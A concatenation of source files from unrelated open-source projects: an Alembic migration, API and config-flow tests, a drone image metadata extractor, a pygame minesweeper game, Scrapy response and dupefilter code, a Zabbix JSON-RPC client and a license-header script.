sa.Column("company_id", sa.INTEGER(), autoincrement=False, nullable=True),
sa.ForeignKeyConstraint(
["company_id"], ["company.id"], name="quarterly_earning_company_id_fkey"
),
sa.PrimaryKeyConstraint("id", name="quarterly_earning_pkey"),
)
op.create_index(
"ix_quarterly_earning_id", "quarterly_earning", ["id"], unique=False
)
op.create_table(
"anual_earning",
sa.Column("id", sa.INTEGER(), autoincrement=True, nullable=False),
sa.Column("fiscal_date_ending", sa.DATE(), autoincrement=False, nullable=True),
sa.Column(
"reported_eps",
postgresql.DOUBLE_PRECISION(precision=53),
autoincrement=False,
nullable=True,
),
sa.Column("company_id", sa.INTEGER(), autoincrement=False, nullable=True),
sa.ForeignKeyConstraint(
["company_id"], ["company.id"], name="anual_earning_company_id_fkey"
),
sa.PrimaryKeyConstraint("id", name="anual_earning_pkey"),
)
op.create_index("ix_anual_earning_id", "anual_earning", ["id"], unique=False)
op.create_table(
"country",
sa.Column("id", sa.INTEGER(), autoincrement=True, nullable=False),
sa.Column("name", sa.VARCHAR(), autoincrement=False, nullable=True),
sa.PrimaryKeyConstraint("id", name="country_pkey"),
sa.UniqueConstraint("name", name="country_name_key"),
)
op.create_index("ix_country_id", "country", ["id"], unique=False)
# ### end Alembic commands ###
```
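To run this revision outside the CLI, Alembic's command API can be invoked programmatically; the ini path below is an assumption about the project layout:

```python
from alembic import command
from alembic.config import Config

config = Config("alembic.ini")  # assumed location of the Alembic configuration

command.upgrade(config, "head")   # apply up to and including this revision
command.downgrade(config, "-1")   # roll back one revision (re-creates the dropped tables)
```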
#### File: test/data_extraction/test_company.py
```python
symbol = "IBM"
from operator import ipow
from unittest import result
from app.data_extraction.company import (
get_function_link,
get_company_overview,
get_company_earnings,
get_settings,
)
from app.constants import EARNINGS_FUNCTION, OVERVIEW_FUNCTION
def test_get_function_link():
function = EARNINGS_FUNCTION
expected_link_1 = (
"https://www.alphavantage.co/query?function=EARNINGS&symbol=IBM&apikey=demo"
)
assert get_function_link(symbol, function) == expected_link_1
function = OVERVIEW_FUNCTION
expected_link_2 = (
"https://www.alphavantage.co/query?function=OVERVIEW&symbol=IBM&apikey=demo"
)
assert get_function_link(symbol, function) == expected_link_2
def test_get_company_overview():
result = get_company_overview(symbol=symbol)
assert result.get("Symbol") == symbol
def test_get_company_earnings():
result = get_company_earnings(symbol=symbol)
assert result.get("symbol") == symbol
```
|
{
"source": "jesusjoaquin/MIT-GIS-DataLab",
"score": 3
}
|
#### File: jesusjoaquin/MIT-GIS-DataLab/ypr_extraction.py
```python
import os
import copy
import pandas as pd
from config import *
def main():
image_paths = find_image_paths(PHOTOS_DIR)
image_list = list()
yaw_list = list()
pitch_list = list()
roll_list = list()
for path in image_paths:
yaw, pitch, roll = find_metadata(path)
# Prepare values to be transformed to CSV
image_list.append(path[-12:])
yaw_list.append(yaw)
pitch_list.append(pitch)
roll_list.append(roll)
d = {'image_name': image_list, 'yaw': yaw_list,
'pitch': pitch_list, 'roll': roll_list}
df = pd.DataFrame(data=d)
df.to_csv(YPR_CSV, index=False)
def find_image_paths(path):
images = list()
for r, d, f in os.walk(path):
for file in f:
if '.JPG' in file:
images.append(os.path.join(r, file))
return images
def find_metadata(image_path):
# Open the file (JPG)
image = open(image_path, 'rb')
data = image.read()
# Locate the metadata in the file
xmp_start = data.find(b'<x:xmpmeta')
xmp_end = data.find(b'</x:xmpmeta')
xmp_str = copy.deepcopy(data[xmp_start:xmp_end+12])
image.close()
return parse_xmp(xmp_str)
def parse_xmp(xmp_str):
# Make return xmp string a list to iterate through fields
xmp_list = xmp_str.split()
# Dict to store the needed metadata
real_meta = dict()
for x in xmp_list:
name_utf = x.decode('utf-8')
if name_utf[:9] == 'drone-dji':
# Get the key-value pair for the specific field
key, value = parse_field(name_utf)
real_meta[key] = value
yaw = real_meta['drone-dji:GimbalYawDegree']
pitch = real_meta['drone-dji:GimbalPitchDegree']
roll = real_meta['drone-dji:GimbalRollDegree']
return (yaw, pitch, roll)
def parse_field(field):
field_elems = field.split('=')
key = field_elems[0]
value = convert_value(field_elems[1])
return key, value
def convert_value(raw_value):
init_chars = raw_value[:2]
if init_chars not in ['"+', '"-']:
return raw_value
elif init_chars == '"+':
return float(raw_value[2:-1])
else:
return -float(raw_value[2:-1])
if __name__ == '__main__':
main()
```
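The XMP attributes arrive as quoted, signed strings; two worked calls through parse_field (the sample values are hypothetical, and the module name is assumed):

```python
from ypr_extraction import parse_field  # assumed module name

# The leading quote and sign and the trailing quote are stripped before conversion.
assert parse_field('drone-dji:GimbalYawDegree="+5.20"') == ('drone-dji:GimbalYawDegree', 5.2)
assert parse_field('drone-dji:GimbalPitchDegree="-90.00"') == ('drone-dji:GimbalPitchDegree', -90.0)
```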
|
{
"source": "Jesus-Lares/Buscaminas",
"score": 3
}
|
#### File: Buscaminas/files/board.py
```python
from time import clock_getres
import pygame
import random
import sys
from box import Box
from utils import SIZE_HEADER
class Board:
def __init__(self, rows, columns, mines, width, height):
self.width = int(width/rows)
self.height = int(height/columns)
        self.rows = rows  # Number of rows (x axis)
        self.columns = columns  # Number of columns (y axis)
self.x0 = self.y0 = 0
self.xx = self.yy = 0
self.hide_mines = [] # Matriz 1xN
self.board = [] # Matriz MxN
self.boxes = [] # Matriz 1xN
self.selection_mines = []# Matriz 1xN
self.create_table_board()
self.lay_mines(mines)
self.place_clues()
        # Creates the array of boxes in the "UNMARKED" state with their board values
color=False
for y in range(columns):
color = not color if columns%2==0 else color
for x in range(rows):
self.boxes.append(Box(x*self.width, y*self.height+SIZE_HEADER, self.width-1, self.height-1, 1, str(self.board[x][y]),color))
color = not color
    # Creates a matrix with the given rows and columns, initialized to 0
def create_table_board(self):
for i in range(self.rows):
self.board.append([])
for j in range(self.columns):
self.board[i].append(0)
    # Places the given number of mines on the board
def lay_mines(self,mines):
num=0
while num<mines:
y=random.randint(0,self.rows-1)
x=random.randint(0,self.columns-1)
if self.board[y][x] != 9:
self.board[y][x]=9
num+=1
self.hide_mines.append((y,x))
    # Places the numeric clues for the minesweeper game
def place_clues(self):
for y in range(self.rows):
for x in range(self.columns):
if self.board[y][x]==9:
for i in [-1,0,1]:
for j in [-1,0,1]:
if 0 <= y+i <= self.rows-1 and 0 <= x+j <= self.columns-1:
if self.board[y+i][x+j] != 9:
self.board[y+i][x+j]+=1
def get_box_close(self):
retorno = 0
for c in range(self.rows * self.columns):
if self.boxes[c].get_status() != 3: retorno = retorno + 1
return retorno
def get_num_bombs(self):
retorno = 0
for y in range(self.columns):
for x in range(self.rows):
if self.board[x][y] == 9: retorno += 1
return retorno
    # Open a box; empty boxes recursively open their neighbours
def open_box(self, x, y):
playing = False
self.boxes[y*self.rows+x].set_status(3)
if self.board[x][y] != 9:
playing = True
if self.board[x][y] == int('0'):
for j in range(-1, 2):
for i in range(-1, 2):
if (x + j >= 0) and (x + j < self.rows) and (y + i >= 0) and (y + i < self.columns) :
if (self.boxes[(y+i)*self.rows+x+j].get_status() != 3):
self.open_box(x+j, y+i)
return playing
    # Draws the boxes
def print_board(self, screen):
for y in range(self.columns):
for x in range(self.rows):
self.boxes[y*self.rows+x].draw_box(screen)
def open_all_mines(self,screen):
for hide_mine in self.hide_mines:
self.open_box(hide_mine[0], hide_mine[1])
self.print_board( screen)
def compare_mines(self):
return sorted(self.hide_mines) == sorted(self.selection_mines)
    # Mouse handling functions
def change_status_box(self,x,y,new_status=1,status=[3,4]):
if 0<=x < self.rows and 0<= y < self.columns:
if self.boxes[y* self.columns +x].get_status() not in status :
self.boxes[y* self.rows +x].set_status(new_status)
def mouse_motion_board(self,positionX,positionY):
x = int(positionX // self.width)
y = int(positionY // (self.height))-1
if y < 0:
self.change_status_box(self.xx,self.yy)
if self.xx != x or self.yy != y:
self.change_status_box(self.xx,self.yy)
self.change_status_box(x,y,2)
self.xx = x
self.yy = y
def mouse_button_left_down(self,positionX,positionY):
self.xx = self.x0 = int(positionX // self.width)
self.yy = self.y0 = int(positionY // (self.height))-1
self.change_status_box(self.xx,self.yy,2)
def mouse_button_left_up(self,positionX,positionY):
playing=True
x = int(positionX // self.width)
y = int(positionY // (self.height))-1
if len(self.boxes)!= 0 and y>=0:
if self.x0 == x and self.y0 == y and self.boxes[y*self.rows+x].get_status() < 3:
playing = self.open_box(x, y)
return playing
def mouse_button_right_down(self,positionX,positionY,numMines):
self.xx = self.x0 = int(positionX // self.width)
self.yy = self.y0 = int(positionY // (self.height))-1
if self.boxes[self.yy* self.columns +self.xx].get_status() == 3 or self.yy<0: return 0
new_status = 4 if self.boxes[self.yy* self.columns +self.xx].get_status() not in [4,3] else 1
if new_status == 4 and numMines<=0:
return 0
if new_status == 4:
self.selection_mines.append((self.xx,self.yy))
else:
self.selection_mines.remove((self.xx,self.yy))
self.change_status_box(self.xx,self.yy,new_status,[3])
return -1 if new_status == 4 else 1
```
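A minimal sketch of constructing and drawing a board; pygame must be initialised first because each Box creates a SysFont, a display surface is needed for drawing, and the module names are assumptions:

```python
import pygame

from board import Board          # assumed module name
from utils import SIZE_HEADER    # assumed module name

pygame.init()
screen = pygame.display.set_mode((450, 450 + SIZE_HEADER))

board = Board(9, 9, 10, 450, 450)   # 9x9 grid, 10 mines, 450x450 px play area
print(board.get_num_bombs())        # -> 10
print(board.get_box_close())        # -> 81, nothing opened yet
board.print_board(screen)
pygame.display.flip()
```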
#### File: Buscaminas/files/box.py
```python
from utils import *
import pygame
import pygame.gfxdraw
class Box():
def __init__(self, x, y, size_x, size_y, status, value,color):
self.font = pygame.font.SysFont("arial",18)
self.color = color
self.x = x
self.y = y
self.size_x = size_x
self.size_y = size_y
        self.status = status # Box state: UNMARKED, CURSOR_OVER, MARKED.
        self.value = value # Box value: ' ', '0'...'8', bomb
def set_status(self, status):
self.status = status
def get_status(self):
return self.status
def draw_box(self, screen):
colorBox=BACKGROUND if self.color else PRIMARY
        if self.status == 1:  # UNMARKED
pygame.gfxdraw.box(screen, (self.x, self.y, self.size_x, self.size_y), colorBox)
        elif self.status == 2:  # CURSOR OVER
pygame.gfxdraw.box(screen, (self.x, self.y, self.size_x, self.size_y), GRAY)
        elif self.status == 3:  # MARKED (revealed)
if int(self.value) == 9:
pygame.gfxdraw.box(screen, (self.x, self.y, self.size_x, self.size_y), RED)
imgMines = pygame.image.load("images/mina.png")
pictureMines = pygame.transform.scale(imgMines,[20,20])
screen.blit(pictureMines, (self.x + (self.size_x / 2) - (pictureMines.get_width()/2), self.y + (self.size_y / 2) - (pictureMines.get_height()/2)))
else:
pygame.gfxdraw.box(screen, (self.x, self.y, self.size_x, self.size_y), SILVER)
size = self.font.size(self.value)
texto = self.font.render(self.value, 1, COLORS_BOXES[int(self.value)])
screen.blit(texto, (self.x + (self.size_x / 2) - (size[0] / 2), self.y + (self.size_y / 2) - (size[1] / 2)))
elif self.status == 4: # FLAG
pygame.gfxdraw.box(screen, (self.x, self.y, self.size_x, self.size_y), colorBox)
imgFlag = pygame.image.load("images/flag.png")
pictureFlag = pygame.transform.scale(imgFlag,[20,20])
screen.blit(pictureFlag, (self.x + (self.size_x / 2) - (pictureFlag.get_width()/2), self.y + (self.size_y / 2) - (pictureFlag.get_height()/2)))
```
|
{
"source": "jesuslg123/ha-tahoma",
"score": 2
}
|
#### File: ha-tahoma/tests/test_config_flow.py
```python
from unittest.mock import patch
from aiohttp import ClientError
from homeassistant import config_entries, data_entry_flow
from pyhoma.exceptions import BadCredentialsException, TooManyRequestsException
import pytest
from pytest_homeassistant_custom_component.common import MockConfigEntry
from custom_components.tahoma.const import DOMAIN
TEST_EMAIL = "<EMAIL>"
TEST_PASSWORD = "<PASSWORD>"
DEFAULT_HUB = "Somfy TaHoma"
async def test_form(hass, enable_custom_integrations):
"""Test we get the form."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["errors"] == {}
with patch("pyhoma.client.TahomaClient.login", return_value=True):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"username": TEST_EMAIL, "password": <PASSWORD>, "hub": DEFAULT_HUB},
)
assert result2["type"] == "create_entry"
assert result2["title"] == TEST_EMAIL
assert result2["data"] == {
"username": TEST_EMAIL,
"password": <PASSWORD>,
"hub": DEFAULT_HUB,
}
await hass.async_block_till_done()
@pytest.mark.parametrize(
"side_effect, error",
[
(BadCredentialsException, "invalid_auth"),
(TooManyRequestsException, "too_many_requests"),
(TimeoutError, "cannot_connect"),
(ClientError, "cannot_connect"),
(Exception, "unknown"),
],
)
async def test_form_invalid(hass, side_effect, error, enable_custom_integrations):
"""Test we handle invalid auth."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch("pyhoma.client.TahomaClient.login", side_effect=side_effect):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"username": TEST_EMAIL, "password": <PASSWORD>, "hub": DEFAULT_HUB},
)
assert result2["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result2["errors"] == {"base": error}
async def test_abort_on_duplicate_entry(hass, enable_custom_integrations):
"""Test config flow aborts Config Flow on duplicate entries."""
MockConfigEntry(
domain=DOMAIN,
unique_id=TEST_EMAIL,
data={"username": TEST_EMAIL, "password": <PASSWORD>, "hub": DEFAULT_HUB},
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch("pyhoma.client.TahomaClient.login", return_value=True), patch(
"custom_components.tahoma.async_setup", return_value=True
) as mock_setup, patch(
"custom_components.tahoma.async_setup_entry", return_value=True
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"username": TEST_EMAIL, "password": <PASSWORD>, "hub": DEFAULT_HUB},
)
assert result2["type"] == "abort"
assert result2["reason"] == "already_configured"
async def test_allow_multiple_unique_entries(hass, enable_custom_integrations):
"""Test config flow allows Config Flow unique entries."""
MockConfigEntry(
domain=DOMAIN,
unique_id="<EMAIL>",
data={
"username": "<EMAIL>",
"password": <PASSWORD>,
"hub": DEFAULT_HUB,
},
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch("pyhoma.client.TahomaClient.login", return_value=True), patch(
"custom_components.tahoma.async_setup", return_value=True
) as mock_setup, patch(
"custom_components.tahoma.async_setup_entry", return_value=True
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"username": TEST_EMAIL, "password": <PASSWORD>, "hub": DEFAULT_HUB},
)
assert result2["type"] == "create_entry"
assert result2["title"] == TEST_EMAIL
assert result2["data"] == {
"username": TEST_EMAIL,
"password": <PASSWORD>,
"hub": DEFAULT_HUB,
}
async def test_import(hass, enable_custom_integrations):
"""Test config flow using configuration.yaml."""
with patch("pyhoma.client.TahomaClient.login", return_value=True), patch(
"custom_components.tahoma.async_setup", return_value=True
) as mock_setup, patch(
"custom_components.tahoma.async_setup_entry", return_value=True
) as mock_setup_entry:
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data={
"username": TEST_EMAIL,
"password": <PASSWORD>,
"hub": DEFAULT_HUB,
},
)
assert result["type"] == "create_entry"
assert result["title"] == TEST_EMAIL
assert result["data"] == {
"username": TEST_EMAIL,
"password": <PASSWORD>,
"hub": DEFAULT_HUB,
}
await hass.async_block_till_done()
assert len(mock_setup.mock_calls) == 1
assert len(mock_setup_entry.mock_calls) == 1
@pytest.mark.parametrize(
"side_effect, error",
[
(BadCredentialsException, "invalid_auth"),
(TooManyRequestsException, "too_many_requests"),
(TimeoutError, "cannot_connect"),
(ClientError, "cannot_connect"),
(Exception, "unknown"),
],
)
async def test_import_failing(hass, side_effect, error, enable_custom_integrations):
"""Test failing config flow using configuration.yaml."""
with patch("pyhoma.client.TahomaClient.login", side_effect=side_effect):
await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data={
"username": TEST_EMAIL,
"password": <PASSWORD>,
"hub": DEFAULT_HUB,
},
)
# Should write Exception to the log
async def test_options_flow(hass, enable_custom_integrations):
"""Test options flow."""
entry = MockConfigEntry(
domain=DOMAIN,
unique_id=TEST_EMAIL,
data={"username": TEST_EMAIL, "password": <PASSWORD>, "hub": DEFAULT_HUB},
)
with patch("pyhoma.client.TahomaClient.login", return_value=True), patch(
"custom_components.tahoma.async_setup_entry", return_value=True
) as mock_setup_entry:
entry.add_to_hass(hass)
assert await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert len(hass.config_entries.async_entries(DOMAIN)) == 1
assert entry.state == config_entries.ENTRY_STATE_LOADED
result = await hass.config_entries.options.async_init(
entry.entry_id, context={"source": "test"}, data=None
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "update_interval"
assert entry.options == {}
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={
"update_interval": 12000,
},
)
assert entry.options == {"update_interval": 12000}
```
|
{
"source": "jesuslosada/scrapy",
"score": 3
}
|
#### File: http/response/__init__.py
```python
from six.moves.urllib.parse import urljoin
from scrapy.http.request import Request
from scrapy.http.headers import Headers
from scrapy.link import Link
from scrapy.utils.trackref import object_ref
from scrapy.http.common import obsolete_setter
from scrapy.exceptions import NotSupported
class Response(object_ref):
def __init__(self, url, status=200, headers=None, body=b'', flags=None, request=None):
self.headers = Headers(headers or {})
self.status = int(status)
self._set_body(body)
self._set_url(url)
self.request = request
self.flags = [] if flags is None else list(flags)
@property
def meta(self):
try:
return self.request.meta
except AttributeError:
raise AttributeError(
"Response.meta not available, this response "
"is not tied to any request"
)
def _get_url(self):
return self._url
def _set_url(self, url):
if isinstance(url, str):
self._url = url
else:
raise TypeError('%s url must be str, got %s:' % (type(self).__name__,
type(url).__name__))
url = property(_get_url, obsolete_setter(_set_url, 'url'))
def _get_body(self):
return self._body
def _set_body(self, body):
if body is None:
self._body = b''
elif not isinstance(body, bytes):
raise TypeError(
"Response body must be bytes. "
"If you want to pass unicode body use TextResponse "
"or HtmlResponse.")
else:
self._body = body
body = property(_get_body, obsolete_setter(_set_body, 'body'))
def __str__(self):
return "<%d %s>" % (self.status, self.url)
__repr__ = __str__
def copy(self):
"""Return a copy of this Response"""
return self.replace()
def replace(self, *args, **kwargs):
"""Create a new Response with the same attributes except for those
given new values.
"""
for x in ['url', 'status', 'headers', 'body', 'request', 'flags']:
kwargs.setdefault(x, getattr(self, x))
cls = kwargs.pop('cls', self.__class__)
return cls(*args, **kwargs)
def urljoin(self, url):
"""Join this Response's url with a possible relative url to form an
absolute interpretation of the latter."""
return urljoin(self.url, url)
@property
def text(self):
"""For subclasses of TextResponse, this will return the body
as text (unicode object in Python 2 and str in Python 3)
"""
raise AttributeError("Response content isn't text")
def css(self, *a, **kw):
"""Shortcut method implemented only by responses whose content
is text (subclasses of TextResponse).
"""
raise NotSupported("Response content isn't text")
def xpath(self, *a, **kw):
"""Shortcut method implemented only by responses whose content
is text (subclasses of TextResponse).
"""
raise NotSupported("Response content isn't text")
def follow(self, url, callback=None, method='GET', headers=None, body=None,
cookies=None, meta=None, encoding='utf-8', priority=0,
dont_filter=False, errback=None):
# type: (...) -> Request
"""
Return a :class:`~.Request` instance to follow a link ``url``.
It accepts the same arguments as ``Request.__init__`` method,
but ``url`` can be a relative URL or a ``scrapy.link.Link`` object,
not only an absolute URL.
:class:`~.TextResponse` provides a :meth:`~.TextResponse.follow`
method which supports selectors in addition to absolute/relative URLs
and Link objects.
"""
if isinstance(url, Link):
url = url.url
url = self.urljoin(url)
return Request(url, callback,
method=method,
headers=headers,
body=body,
cookies=cookies,
meta=meta,
encoding=encoding,
priority=priority,
dont_filter=dont_filter,
errback=errback)
```
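A short usage sketch of the helpers defined above (a hypothetical spider callback; the URLs and callback name are invented):
```python
# Hypothetical callback illustrating Response.urljoin, Response.follow and Response.replace.
def parse(self, response):
    absolute = response.urljoin('page/2')                   # resolve a relative URL against response.url
    yield response.follow('page/2', callback=self.parse)    # relative URL or Link object -> Request
    cached_copy = response.replace(flags=['cached'])        # copy with selected attributes overridden
```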
#### File: scrapy/tests/test_dupefilters.py
```python
import hashlib
import tempfile
import unittest
import shutil
from scrapy.dupefilters import RFPDupeFilter
from scrapy.http import Request
from scrapy.utils.python import to_bytes
class RFPDupeFilterTest(unittest.TestCase):
def test_filter(self):
dupefilter = RFPDupeFilter()
dupefilter.open()
r1 = Request('http://scrapytest.org/1')
r2 = Request('http://scrapytest.org/2')
r3 = Request('http://scrapytest.org/2')
assert not dupefilter.request_seen(r1)
assert dupefilter.request_seen(r1)
assert not dupefilter.request_seen(r2)
assert dupefilter.request_seen(r3)
dupefilter.close('finished')
def test_dupefilter_path(self):
r1 = Request('http://scrapytest.org/1')
r2 = Request('http://scrapytest.org/2')
path = tempfile.mkdtemp()
try:
df = RFPDupeFilter(path)
df.open()
assert not df.request_seen(r1)
assert df.request_seen(r1)
df.close('finished')
df2 = RFPDupeFilter(path)
df2.open()
assert df2.request_seen(r1)
assert not df2.request_seen(r2)
assert df2.request_seen(r2)
df2.close('finished')
finally:
shutil.rmtree(path)
def test_request_fingerprint(self):
"""Test if customization of request_fingerprint method will change
output of request_seen.
"""
r1 = Request('http://scrapytest.org/index.html')
r2 = Request('http://scrapytest.org/INDEX.html')
dupefilter = RFPDupeFilter()
dupefilter.open()
assert not dupefilter.request_seen(r1)
assert not dupefilter.request_seen(r2)
dupefilter.close('finished')
class CaseInsensitiveRFPDupeFilter(RFPDupeFilter):
def request_fingerprint(self, request):
fp = hashlib.sha1()
fp.update(to_bytes(request.url.lower()))
return fp.hexdigest()
case_insensitive_dupefilter = CaseInsensitiveRFPDupeFilter()
case_insensitive_dupefilter.open()
assert not case_insensitive_dupefilter.request_seen(r1)
assert case_insensitive_dupefilter.request_seen(r2)
case_insensitive_dupefilter.close('finished')
```
|
{
"source": "jesuslosada/zabbix-client",
"score": 2
}
|
#### File: zabbix-client/zabbix_client/api_wrapper.py
```python
import logging
import json
import string
import socket
try:
from urllib.request import Request, build_opener
except ImportError:
# Python 2
from urllib2 import Request, build_opener
try:
from urllib.error import URLError, HTTPError as _HTTPError
except ImportError:
# Python 2
from urllib2 import URLError, HTTPError as _HTTPError
try:
from io import BytesIO
except ImportError:
# Python 2
try:
# C implementation
from cStringIO import StringIO as BytesIO
except ImportError:
# Python implementation
from StringIO import StringIO as BytesIO
try:
import gzip
except ImportError:
# Python can be built without zlib/gzip support
gzip = None
try:
import requests
except ImportError:
requests = None
from . import __version__
from .exceptions import (
ZabbixClientError, TransportError, TimeoutError, HTTPError, ResponseError,
ContentDecodingError, InvalidJSONError, JSONRPCError
)
# Default network timeout (in seconds)
DEFAULT_TIMEOUT = 30
logger = logging.getLogger(__name__)
def dumps(id_, method, params=None, auth=None):
rpc_request = {
'jsonrpc': '2.0',
'id': id_,
'method': method
}
if params is not None:
rpc_request['params'] = params
else:
# Zabbix 3 and later versions fail if 'params' is omitted
rpc_request['params'] = {}
if auth is not None:
rpc_request['auth'] = auth
dump = json.dumps(rpc_request, separators=(',', ':')).encode('utf-8')
if logger.isEnabledFor(logging.INFO):
json_str = json.dumps(rpc_request, sort_keys=True)
logger.info("JSON-RPC request: {0}".format(json_str))
return dump
def loads(response):
try:
rpc_response = json.loads(response.decode('utf-8'))
except ValueError as e:
raise InvalidJSONError(e)
if not isinstance(rpc_response, dict):
raise ResponseError('Response is not a dict')
if 'jsonrpc' not in rpc_response or rpc_response['jsonrpc'] != '2.0':
raise ResponseError('JSON-RPC version not supported')
if 'error' in rpc_response:
error = rpc_response['error']
if 'code' not in error or 'message' not in error:
raise ResponseError('Invalid JSON-RPC error object')
code = error['code']
message = error['message']
# 'data' may be omitted
data = error.get('data', None)
if data is None:
exception_message = 'Code: {0}, Message: {1}'.format(code, message)
else:
exception_message = ('Code: {0}, Message: {1}, ' +
'Data: {2}').format(code, message, data)
raise JSONRPCError(exception_message, code=code, message=message,
data=data)
if 'result' not in rpc_response:
raise ResponseError('Response does not contain a result object')
if logger.isEnabledFor(logging.INFO):
json_str = json.dumps(rpc_response, sort_keys=True)
logger.info("JSON-RPC response: {0}".format(json_str))
return rpc_response
class ZabbixServerProxy(object):
def __init__(self, url, transport=None):
self.url = url if not url.endswith('/') else url[:-1]
self.url += '/api_jsonrpc.php'
logger.debug("Zabbix server URL: {0}".format(self.url))
if transport is not None:
self.transport = transport
else:
if requests:
logger.debug("Using requests as transport layer")
self.transport = RequestsTransport()
else:
logger.debug("Using urllib libraries as transport layer")
self.transport = UrllibTransport()
self._request_id = 0
self._auth_token = None
self._method_hooks = {
'apiinfo.version': self._no_auth_method,
'user.login': self._login,
'user.authenticate': self._login, # deprecated alias of user.login
'user.logout': self._logout
}
def __getattr__(self, name):
return ZabbixObject(name, self)
def call(self, method, params=None):
method_lower = method.lower()
if method_lower in self._method_hooks:
return self._method_hooks[method_lower](method, params=params)
return self._call(method, params=params, auth=self._auth_token)
def _call(self, method, params=None, auth=None):
self._request_id += 1
rpc_request = dumps(self._request_id, method, params=params, auth=auth)
content = self.transport.request(self.url, rpc_request)
rpc_response = loads(content)
return rpc_response['result']
def _no_auth_method(self, method, params=None):
return self._call(method, params=params)
def _login(self, method, params=None):
self._auth_token = None
# Save the new token if the request is successful
self._auth_token = self._call(method, params=params)
return self._auth_token
def _logout(self, method, params=None):
try:
result = self._call(method, params=params, auth=self._auth_token)
except ZabbixClientError:
raise
finally:
self._auth_token = None
return result
class ZabbixObject(object):
def __init__(self, name, server_proxy):
self.name = name
self.server_proxy = server_proxy
def __getattr__(self, name):
def call_wrapper(*args, **kwargs):
if args and kwargs:
raise ValueError('JSON-RPC 2.0 does not allow both ' +
'positional and keyword arguments')
method = '{0}.{1}'.format(self.name, name)
params = args or kwargs or None
return self.server_proxy.call(method, params=params)
# Little hack to avoid clashes with reserved keywords.
# Example: use configuration.import_() to call configuration.import()
if name.endswith('_'):
name = name[:-1]
return call_wrapper
class Transport(object):
def __init__(self, timeout=DEFAULT_TIMEOUT):
self.timeout = timeout
def request(self, url, rpc_request):
raise NotImplementedError
@staticmethod
def _add_headers(headers):
# Set the JSON-RPC headers
json_rpc_headers = {
'Content-Type': 'application/json',
'Accept': 'application/json'
}
headers.update(json_rpc_headers)
# If no custom header exists, set the default user-agent
if 'User-Agent' not in headers:
headers['User-Agent'] = 'zabbix-client/{0}'.format(__version__)
class RequestsTransport(Transport):
def __init__(self, *args, **kwargs):
if not requests:
raise ValueError('requests is not available')
self.session = kwargs.pop('session', None)
super(RequestsTransport, self).__init__(*args, **kwargs)
if self.session is None:
self.session = requests.Session()
# Delete default requests' user-agent
self.session.headers.pop('User-Agent', None)
self._add_headers(self.session.headers)
def request(self, url, rpc_request):
try:
response = self.session.post(url, data=rpc_request,
timeout=self.timeout)
response.raise_for_status()
content = response.content
except requests.Timeout as e:
raise TimeoutError(e)
except requests.exceptions.ContentDecodingError as e:
raise ContentDecodingError(e)
except requests.HTTPError as e:
raise HTTPError(e)
except requests.RequestException as e:
raise TransportError(e)
return content
class UrllibTransport(Transport):
def __init__(self, *args, **kwargs):
self.accept_gzip_encoding = kwargs.pop('accept_gzip_encoding', True)
headers = kwargs.pop('headers', None)
super(UrllibTransport, self).__init__(*args, **kwargs)
self.headers = {}
if headers:
for key, value in headers.items():
self.headers[string.capwords(key, '-')] = value
self._add_headers(self.headers)
if self.accept_gzip_encoding and gzip:
self.headers['Accept-Encoding'] = 'gzip'
self._opener = build_opener()
def request(self, url, rpc_request):
request = Request(url, data=rpc_request, headers=self.headers)
try:
response = self._opener.open(request, timeout=self.timeout)
content = response.read()
except _HTTPError as e:
raise HTTPError(e)
except URLError as e:
if isinstance(e.reason, socket.timeout):
raise TimeoutError(e)
else:
raise TransportError(e)
except socket.timeout as e:
raise TimeoutError(e)
encoding = response.info().get('Content-Encoding', '').lower()
if encoding in ('gzip', 'x-gzip'):
if not gzip:
raise ValueError('gzip is not available')
b = BytesIO(content)
try:
content = gzip.GzipFile(mode='rb', fileobj=b).read()
except IOError as e:
raise ContentDecodingError(e)
return content
```
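A brief usage sketch of the dynamic dispatch implemented by `__getattr__` above (server URL, credentials and parameters are invented):
```python
# Hypothetical usage of ZabbixServerProxy: attribute access builds JSON-RPC method names.
server = ZabbixServerProxy('http://zabbix.example.com')
server.user.login(user='Admin', password='example-password')  # handled by the user.login hook, stores the auth token
print(server.apiinfo.version())                                # no auth token required for this method
hosts = server.host.get(output=['hostid', 'name'])             # becomes JSON-RPC method "host.get"
server.configuration.import_(format='json', source='{}', rules={})  # trailing "_" maps to "configuration.import"
server.user.logout()
```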
|
{
"source": "jesuslou/LouEngine",
"score": 2
}
|
#### File: tools/scripts/LicenseHeaderIncluder.py
```python
import argparse
import os
license = """////////////////////////////////////////////////////////////
//
// LouEngine - Multiplatform Game Engine Project
// Copyright (C) 2016-2017 <NAME> (<EMAIL>)
//
// This software is provided 'as-is', without any express or implied warranty.
// In no event will the authors be held liable for any damages arising from the use of this software.
//
// Permission is granted to anyone to use this software for any purpose,
// including commercial applications, and to alter it and redistribute it freely,
// subject to the following restrictions:
//
// 1. The origin of this software must not be misrepresented;
// you must not claim that you wrote the original software.
// If you use this software in a product, an acknowledgment
// in the product documentation would be appreciated but is not required.
//
// 2. Altered source versions must be plainly marked as such,
// and must not be misrepresented as being the original software.
//
// 3. This notice may not be removed or altered from any source distribution.
//
////////////////////////////////////////////////////////////
"""
def path_to_os(path):
full_path = os.path.abspath(path)
parts = full_path.split("/")
return os.path.sep.join(parts)
def read_parameters():
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--paths', required=True, nargs='+', help='Paths to look for files to add license')
args = parser.parse_args()
return args.paths
